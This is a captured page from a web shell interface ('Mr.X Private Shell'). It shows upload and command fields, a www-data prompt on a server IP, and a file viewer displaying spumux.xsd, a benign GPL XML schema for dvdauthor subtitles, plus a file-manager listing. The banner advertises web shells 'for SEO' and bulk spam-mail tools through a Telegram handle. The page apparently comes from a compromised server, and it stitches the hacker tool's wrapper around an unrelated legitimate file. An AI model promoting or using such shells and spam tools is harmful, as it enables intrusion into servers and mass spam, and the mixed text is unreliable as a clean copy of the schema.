__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.148: ~ $
<?xml version="1.0" encoding="UTF-8"?>
<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema">

  <xsd:annotation>
    <xsd:documentation xml:lang="en">
     XML Schema Definition for spumux.
     Author: Alan Canon (acanon@bellsouth.net)
     Date: 1/8/2005
     This Schema is made available under the terms of the GNU GPL.
     See http://www.gnu.org/ for details.
     // TODO Copy the spumux man page documentation as xsd:annotations to the below.
    </xsd:documentation>
  </xsd:annotation>

  <xsd:include schemaLocation="common.xsd"/>

  <xsd:element name="subpictures" type="SubpicturesType"/>

  <xsd:complexType name="SubpicturesType">
    <xsd:sequence>
      <xsd:element name="stream" type="StreamType"/>
    </xsd:sequence>
    <xsd:attribute name="format">
      <xsd:simpleType>
        <xsd:restriction base="xsd:token">
          <xsd:enumeration value="NTSC"/>
          <xsd:enumeration value="PAL"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:attribute>
  </xsd:complexType>

  <xsd:complexType name="StreamType">
    <xsd:choice>
      <xsd:sequence>
        <xsd:element name="spu" type="SpuType"/>
      </xsd:sequence>
      <xsd:element name="textsub" type="TextsubType"/>
    </xsd:choice>
  </xsd:complexType>

  <xsd:complexType name="SpuType">
    <xsd:sequence>
      <xsd:element name="button" type="ButtonType" minOccurs="0" maxOccurs="unbounded" />
      <xsd:element name="action" type="ActionType" minOccurs="0" maxOccurs="unbounded" />
    </xsd:sequence>
    <!-- HR:MM:SS.HU -->
    <xsd:attribute name="start" type="xsd:string" use="optional"/>
    <!-- HR:MM:SS.HU -->
    <xsd:attribute name="end" type="xsd:string" use="optional"/>
    <xsd:attribute name="image" type="xsd:string"/>
    <xsd:attribute name="highlight" type="xsd:string"/>
    <xsd:attribute name="select" type="xsd:string"/>
    <xsd:attribute name="transparent" type="xsd:string"/>
    <xsd:attribute name="force" type="isOnType"/>
    <xsd:attribute name="autooutline" type="xsd:string"/>
    <xsd:attribute name="outlinewidth" type="xsd:string"/>
    <!-- [ autoorder="rows" | autoorder="columns" ] -->
    <xsd:attribute name="autoorder" type="xsd:string"/>
    <xsd:attribute name="xoffset" type="xsd:string"/>
    <xsd:attribute name="yoffset" type="xsd:string"/>
  </xsd:complexType>

  <xsd:complexType name="ButtonType">
    <xsd:attribute name="name" type="xsd:string"/>
    <xsd:attribute name="x0" type="xsd:string"/>
    <xsd:attribute name="y0" type="xsd:string"/>
    <xsd:attribute name="x1" type="xsd:string"/>
    <xsd:attribute name="y1" type="xsd:string"/>
    <xsd:attribute name="up" type="xsd:string"/>
    <xsd:attribute name="down" type="xsd:string"/>
    <xsd:attribute name="left" type="xsd:string"/>
    <xsd:attribute name="right" type="xsd:string"/>
  </xsd:complexType>

  <xsd:complexType name="ActionType">
    <xsd:attribute name="name" type="xsd:string"/>
    <xsd:attribute name="x0" type="xsd:string"/>
    <xsd:attribute name="y0" type="xsd:string"/>
    <xsd:attribute name="x1" type="xsd:string"/>
    <xsd:attribute name="y1" type="xsd:string"/>
    <xsd:attribute name="up" type="xsd:string"/>
    <xsd:attribute name="down" type="xsd:string"/>
    <xsd:attribute name="left" type="xsd:string"/>
    <xsd:attribute name="right" type="xsd:string"/>
  </xsd:complexType>


  <xsd:complexType name="TextsubType">
    <xsd:attribute name="filename" type="xsd:string"/>
    <xsd:attribute name="characterset" type="xsd:string"/>
    <xsd:attribute name="fontsize" type="xsd:string"/>
    <xsd:attribute name="force" type="isOnType"/>
    <xsd:attribute name="font" type="xsd:string"/>
    <xsd:attribute name="fill-color" type="xsd:string"/>
    <xsd:attribute name="outline-color" type="xsd:string"/>
    <xsd:attribute name="outline-thickness" type="xsd:float"/>
    <xsd:attribute name="shadow-color" type="xsd:string"/>
    <xsd:attribute name="shadow-offset">
      <xsd:simpleType>
        <xsd:restriction base="xsd:token">
          <xsd:pattern value="[+-][0-9]+, [+-][0-9]+"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:attribute>
    <xsd:attribute name="horizontal-alignment" type="xsd:string"/>
    <xsd:attribute name="vertical-alignment" type="xsd:string"/>
    <xsd:attribute name="left-margin" type="xsd:string"/>
    <xsd:attribute name="right-margin" type="xsd:string"/>
    <xsd:attribute name="top-margin" type="xsd:string"/>
    <xsd:attribute name="bottom-margin" type="xsd:string"/>
    <xsd:attribute name="subtitle-fps" type="xsd:string"/>
    <xsd:attribute name="movie-fps" type="xsd:string"/>
    <xsd:attribute name="movie-width" type="xsd:string"/>
    <xsd:attribute name="movie-height" type="xsd:string"/>
    <xsd:attribute name="aspect">
      <xsd:simpleType>
        <xsd:restriction base="xsd:token">
          <xsd:enumeration value="16:9"/>
          <xsd:enumeration value="4:3"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:attribute>
  </xsd:complexType>

</xsd:schema>

Filemanager

Name Type Size Permission Actions
common.xsd File 468 B 0644
dvdauthor.xsd File 8.53 KB 0644
spumux.xsd File 4.9 KB 0644
Filemanager